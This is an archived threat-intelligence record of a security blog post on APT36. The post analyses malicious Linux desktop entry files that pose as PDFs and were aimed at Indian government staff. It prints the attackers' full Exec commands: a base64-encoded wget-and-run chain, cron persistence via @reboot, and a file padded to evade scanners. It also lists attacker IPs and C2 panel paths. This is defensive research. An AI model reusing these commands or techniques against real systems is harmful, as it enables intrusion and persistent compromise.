{ "id": "1e38064d-bee2-46cd-bb5a-33ce4ef6ab57", "created_at": "2026-04-06T00:17:55.353385Z", "updated_at": "2026-04-10T13:12:05.88279Z", "deleted_at": null, "sha1_hash": "407423e2af3d2bd6c14f2b254f19759f23e8edaa", "title": "APT36's Updated Arsenal | ThreatLabz", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 1204281, "plain_text": "APT36's Updated Arsenal | ThreatLabz\r\nBy Sudeep Singh\r\nPublished: 2023-09-12 · Archived: 2026-04-02 12:20:45 UTC\r\nMalicious Linux Desktop Entry Files as New Attack Vectors\r\nThe utilization of Linux desktop entry files by APT36 as an attack vector has never been documented before. This\r\nattack vector is fairly new and appears to be utilized in very low-volume attacks. So far, our research team has\r\ndiscovered three samples - all of which have 0 detection on VirusTotal.\r\nWe first observed an occurrence in May 2023 when a credential phishing website used to target Indian\r\ngovernment employees was also found to be hosting a redirector to distribute ZIP archives containing malicious\r\nLinux desktop entry files.\r\nNational Informatics Center (NIC), India Phishing Attack - May 2023\r\nIn May 2023, we discovered a credential phishing site, email9ov[.]in, targeting Indian government officials by\r\nmasquerading as the official login portal for National Informatics Center (NIC), India. We notified NIC in May\r\n2023 about this website and the associated threat intel.\r\nWe also noticed that the same phishing website was using the hxxps://email9ov[.]in/VISIT_OF_MEDICAL\r\nURL to redirect visitors to the hxxp://103.2.232[.]82:8081/Tri-Service-Exercise/Delegation_Saudi_Arabia.zip\r\nURL.\r\nFrom here, a visitor would download a ZIP archive containing a maliciously crafted Linux desktop entry file.\r\nHere are some technical details about this case:\r\nZIP archive MD5 hash: 9c66f8c0c970822985600bed04e56434\r\nZIP filename: Delegation_Saudi_Arabia.zip\r\nDesktop entry file MD5 hash: f27a4968af4ed64baef8e086516e86ac\r\nDesktop entry filename: Delegation_Saudi_Arabia.desktop\r\n \r\nDesktop entry file analysis\r\nWe found the following content in the desktop entry file:\r\n \r\n[Desktop Entry]\r\nEncoding=UTF-8\r\nName=Delegation_Saudi_Arabia.pdf\r\nExec=sh -c \"echo 'L3Vzci9iaW4vd2dldCAnaHR0cDovLzEwMy4yLjIzMi44Mjo4MDgxL1R\r\nhttps://www.zscaler.com/blogs/security-research/peek-apt36-s-updated-arsenal\r\nPage 1 of 8\n\nyaS1TZXJ2aWNlLUV4ZXJjaXNlL0RlbGVnYXRpb25fU2F1ZGlfQXJhYmlhLnBkZicgLU8g\r\nL3RtcC9EZWxlZ2F0aW9uX1NhdWRpX0FyYWJpYS5wZGY7IC91c3IvYmluL3dnZXQgJ2\r\nh0dHA6Ly8xMDMuMi4yMzIuODI6ODA4MS9JU0VQQy0xMi0yMDIzLUFnZW5kYS1mb3It\r\nbWVldGluZy8xODUnIC1PIC90bXAvMTg1LmVsZjsgY2QgL3RtcDsgY2htb2QgK3ggMTg1\r\nLmVsZjtsaWJyZW9mZmljZSAvdG1wL0RlbGVnYXRpb25fU2F1ZGlfQXJhYmlhLn\r\nBkZiB8IC4vMTg1LmVsZg==' | base64 -d | sh\"\r\nTerminal=false\r\nType=Application\r\nIcon=x-office-document\r\nThe icon of this desktop entry file is set to \"x-office-document\" to seem like an innocent Office document.\r\nThe base64-encoded command present inside the desktop entry file decodes to:\r\n \r\n/usr/bin/wget 'hxxp://103.2.232[.]82:8081/Tri-Service-Exercise/Delegation_Saudi_Arabia.pdf' -O\r\n/tmp/Delegation_Saudi_Arabia.pdf; /usr/bin/wget 'hxxp://103.2.232[.]82:8081/ISEPC-12-2023-Agenda-for-meeting/185' -O /tmp/185.elf; cd /tmp; chmod +x 185.elf;libreoffice /tmp/Delegation_Saudi_Arabia.pdf | ./185\r\nThe command decoded above performs the following actions:\r\n1. Downloads the decoy PDF and saves it in the /tmp directory with the filename: Delegation_Saudi_Arabia.pdf\r\n.\r\n2. Downloads the Linux payload and saves it in the /tmp directory with the filename: 185.elf .\r\n3. Marks the Linux binary as executable.\r\n4. Uses LibreOffice to open and display the decoy PDF file.\r\n5. Executes the Linux payload.\r\nIn this case, the Linux payload was a cross-platform binary designed to run on both Linux and WSL (Windows\r\nSubsystem for Linux) machines. Since it did not contain a fully functional C2 mechanism at the time of analysis,\r\nwe believe it was still in a development phase and used by the threat actor as an initial test.\r\nTo read about “Lee” agent’s cross-platform capabilities, visit the Lumen blog.\r\nThe content inside the decoy PDF file is displayed in the image below.\r\nhttps://www.zscaler.com/blogs/security-research/peek-apt36-s-updated-arsenal\r\nPage 2 of 8\n\nFigure 5: Decoy PDF displayed to the user.\r\nThe PDF appears to be a document from the Indian Ministry of Defence describing the visit of nine members of a\r\ndelegation from Saudi Arabia, where they discussed issues with Indian Armed Forces medical officials.\r\nInflated File Attack - June 2023\r\nBeginning in June 2023, we detected APT36 establishing their operational infrastructure on a server with the IP\r\naddress 153.92.220.59. The threat actor proceeded to register multiple domains hosted on this IP. Further insight\r\ninto this attacker-controlled infrastructure is available in the Threat Actor Infrastructure section.\r\nIn August, we noted a significant development where few of these domains served as the hosting platform for\r\ndecoy PDF files. These PDFs were linked within the malicious Linux desktop entry files, which the threat actor\r\ndistributed enclosed in zip archives.\r\nHere are some technical details about this case:\r\nZIP archive MD5 hash: 36b19ca8737c63b9c9a3365ff4968ef5\r\nZIP filename: Meeting_agenda.zip\r\nDesktop entry file MD5 hash: 65167974b397493fce320005916a13e9\r\nDesktop entry filename: approved_copy.desktop\r\n \r\nhttps://www.zscaler.com/blogs/security-research/peek-apt36-s-updated-arsenal\r\nPage 3 of 8\n\nDesktop entry file analysis\r\nThe first anomaly we observed was the large size of the Linux desktop entry file. A size larger than 1 MB for a\r\nLinux desktop entry file is rare. Reviewing the file revealed that the threat actor inflated the size of the file by\r\nadding more than a million \"#\" characters. We believe this was an attempt by the threat actor to bypass security\r\nscanning solutions.\r\nThe image below shows the extra characters added to the inflated Linux desktop entry file.\r\nFigure 6: The inflated Linux desktop entry file.\r\nThe relevant content from the Linux desktop entry file is shown below.\r\n \r\n[Desktop Entry]\r\nType=Application\r\nName=approved_copy.pdf\r\nExec=bash -c \"xdg-open 'https://admin-dept[.]in//approved_copy.pdf' \u0026\u0026 mkdir -p ~/.local/share \u0026\u0026 wget\r\n64.227.133[.]222/zswap-xbusd -O ~/.local/share/zswap-xbusd \u0026\u0026 chmod +x ~/.local/share/zswap-xbusd; echo\r\n'@reboot ~/.local/share/zswap-xbusd'\u003e\u003e/dev/shm/myc.txt; crontab -u `whoami` /dev/shm/myc.txt; rm\r\n/dev/shm/myc.txt; ~/.local/share/zswap-xbusd\"\r\nIcon=application-pdf\r\nName[en_US]=approved_copy.desktop\r\nThis desktop file performs these main operations:\r\n1. Downloads the decoy PDF file from the https://admin-dept[.]in/approved_copy.pdf URL and displays it\r\nto the victim. This decoy file contains an error message to distract the user. Figure 7 shows that the icon of\r\nthis desktop file is set to application-pdf which is done to disguise the malware as an innocuous file.\r\n2. Creates a hidden directory path called, local/share, in the user's home directory.\r\nhttps://www.zscaler.com/blogs/security-research/peek-apt36-s-updated-arsenal\r\nPage 4 of 8\n\n3. Downloads the Linux payload from the URL  64.227.133[.]222/zswap-xbusd using wget. Saves it as\r\nzswap-xbusd in the previously created hidden directory.\r\n4. Writes a short shell script to the file /dev/shm/myc.txt. The shell script reboots the machine and then\r\nlaunches the Linux payload. \r\n5. Sets up a cron job under the current username to run the contents of the /dev/shm/myc.txt script.\r\n6. Deletes the shell script.\r\n7. Executes the Linux payload. \r\nFigure 7: The icon of the desktop configuration file is set to PDF to make it more convincing.\r\nAt the time of our analysis, the server 64.227.133[.]222 was not serving the Linux payload. We continued\r\nmonitoring this infrastructure and noticed that on Aug 29, 2023, a new domain called admin-br[.]in was\r\nregistered and used to distribute a new Linux desktop entry file. In this instance, we were able to retrieve the\r\npayloads and conclude the threat attribution to APT36.\r\nHere is metadata from the new Linux desktop entry file:\r\nMD5 hash: 574013c4a22ca2d8d8c76e65ef5e8059\r\nFilename: approved_copy.desktop\r\nThe relevant content from the Linux desktop entry file is shown below.\r\n \r\n[Desktop Entry]\r\nType=Application     \r\nName=approved_copy.pdf          \r\nExec=bash -c \"xdg-open 'https://admin-br[.]in//approved_copy.pdf' \u0026\u0026 mkdir -p ~/.local/share \u0026\u0026 wget\r\nhttps://www.zscaler.com/blogs/security-research/peek-apt36-s-updated-arsenal\r\nPage 5 of 8\n\n64.227.138[.]127/4200f0916f146d2ac5448e91a3afe1b3/pickle-help -O ~/.local/share/pickle-help \u0026\u0026 chmod +x\r\n~/.local/share/pickle-help;~/.local/share/pickle-help \u003e/dev/null 2\u003e\u00261 \u0026 sleep 5; wget\r\n134.209.159[.]9/4200f0916f146d2ac5448e91a3afe1b3/ziputils-help -O ~/.local/share/ziputils-help \u0026\u0026 chmod +x\r\n~/.local/share/ziputils-help; echo '@reboot ~/.local/share/ziputils-help'\u003e\u003e/dev/shm/myc.txt;echo '@reboot\r\n~/.local/share/ziputils-help'\u003e\u003e/dev/shm/myc.txt; crontab -u `whoami` /dev/shm/myc.txt; rm\r\n/dev/shm/myc.txt;~/.local/share/ziputils-help \u0026\"\r\nIcon=application-pdf     \r\nName[en_US]=approved_copy.desktop\r\nThe functionality of this file is similar to the previous Linux desktop entry file. \r\nThe image below shows a decoy PDF file displaying an error message stating “Failed to load the PDF document”.\r\nThis is used to distract the user while malicious activities occur in the background.\r\nFigure 8: The decoy PDF file displayed to the user.\r\nIn this case, the Linux desktop entry file retrieves the malicious Linux payloads from the servers at:\r\n64.227.138[.]127\r\n134.209.159[.]9 \r\nThe two files retrieved are cleverly named to disguise themselves as legitimate software utilities.\r\nHere is the metadata of Linux payloads:\r\nMD5 hash: 98279047a7db080129e5ec84533822ef\r\nFilename: pickle-help\r\nhttps://www.zscaler.com/blogs/security-research/peek-apt36-s-updated-arsenal\r\nPage 6 of 8\n\nMD5 hash: 248d4e6bb0f32afd7a1cfb975910235a\r\nFilename: ziputils-help\r\nA quick technical analysis determined these Linux payloads as Mythic Poseidon binaries. Since Mythic is an\r\nopen-source framework that is well-documented on GitHub, we will not explore its technical details in this blog.\r\nThe corresponding C2 servers extracted from each malicious Linux payload are listed below.\r\n \r\nTable 2: C2 servers from malicious Linux payload\r\nC2 IP ADDRESS PORT\r\n108.61.163[.]195 7443\r\n64.176.40[.]100 7443\r\nThe C2 panel for Mythic Poseidon can be accessed by visiting the URI path /new/login on the server running at\r\nport 7443. \r\nFor instance, the C2 panel for 108.61.163[.]195 can be accessed at hxxps://108.61.163[.]195:7443/new/login .\r\nFigure 9: The Mythic C2 panel for the Poseidon binary.\r\nhttps://www.zscaler.com/blogs/security-research/peek-apt36-s-updated-arsenal\r\nPage 7 of 8\n\nExplore more Zscaler blogs\r\nSource: https://www.zscaler.com/blogs/security-research/peek-apt36-s-updated-arsenal\r\nhttps://www.zscaler.com/blogs/security-research/peek-apt36-s-updated-arsenal\r\nPage 8 of 8", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "origins": [ "web" ], "references": [ "https://www.zscaler.com/blogs/security-research/peek-apt36-s-updated-arsenal" ], "report_names": [ "peek-apt36-s-updated-arsenal" ], "threat_actors": [ { "id": "414d7c65-5872-4e56-8a7d-49a2aeef1632", "created_at": "2025-08-07T02:03:24.7983Z", "updated_at": "2026-04-10T02:00:03.76109Z", "deleted_at": null, "main_name": "COPPER FIELDSTONE", "aliases": [ "APT36 ", "Earth Karkaddan ", "Gorgon Group ", "Green Havildar ", "Mythic Leopard ", "Operation C-Major ", "Operation Transparent Tribe ", "Pasty Draco ", "ProjectM ", "Storm-0156 " ], "source_name": "Secureworks:COPPER FIELDSTONE", "tools": [ "CapraRAT", "Crimson RAT", "DarkComet", "ElizaRAT", "LuminosityLink", "ObliqueRAT", "Peppy", "njRAT" ], "source_id": "Secureworks", "reports": null }, { "id": "eb3f4e4d-2573-494d-9739-1be5141cf7b2", "created_at": "2022-10-25T16:07:24.471018Z", "updated_at": "2026-04-10T02:00:05.002374Z", "deleted_at": null, "main_name": "Cron", "aliases": [], "source_name": "ETDA:Cron", "tools": [ "Catelites", "Catelites Bot", "CronBot", "TinyZBot" ], "source_id": "ETDA", "reports": null }, { "id": "fce5181c-7aab-400f-bd03-9db9e791da04", "created_at": "2022-10-25T15:50:23.759799Z", "updated_at": "2026-04-10T02:00:05.3002Z", "deleted_at": null, "main_name": "Transparent Tribe", "aliases": [ "Transparent Tribe", "COPPER FIELDSTONE", "APT36", "Mythic Leopard", "ProjectM" ], "source_name": "MITRE:Transparent Tribe", "tools": [ "DarkComet", "ObliqueRAT", "njRAT", "Peppy" ], "source_id": "MITRE", "reports": null }, { "id": "c68fa27f-e8d9-4932-856b-467ccfe39997", "created_at": "2023-01-06T13:46:38.450585Z", "updated_at": "2026-04-10T02:00:02.980334Z", "deleted_at": null, "main_name": "Operation C-Major", "aliases": [ "APT36", "APT 36", "TMP.Lapis", "COPPER FIELDSTONE", "Storm-0156", "Transparent Tribe", "ProjectM", "Green Havildar", "Earth Karkaddan", "C-Major", "Mythic Leopard" ], "source_name": "MISPGALAXY:Operation C-Major", "tools": [], "source_id": "MISPGALAXY", "reports": null } ], "ts_created_at": 1775434675, "ts_updated_at": 1775826725, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/407423e2af3d2bd6c14f2b254f19759f23e8edaa.pdf", "text": "https://archive.orkl.eu/407423e2af3d2bd6c14f2b254f19759f23e8edaa.txt", "img": "https://archive.orkl.eu/407423e2af3d2bd6c14f2b254f19759f23e8edaa.jpg" } }